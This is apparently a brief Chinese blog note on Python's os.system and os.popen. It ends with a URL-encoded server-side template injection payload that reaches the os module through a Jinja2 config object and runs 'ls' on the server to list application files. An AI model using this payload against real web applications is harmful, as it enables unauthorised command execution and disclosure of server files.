您的位置:首页 > 博客中心 > 编程语言 >

关于python常用的命令

时间:2022-03-29 02:01

os模块:

os.system

os.system("cat/cmd等...")

os.popen

print os.popen("adb shell ls ../aa.png").read() >>> 输出:aa.png

爆出包含文件

{{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

 

本类排行

今日推荐

热门手游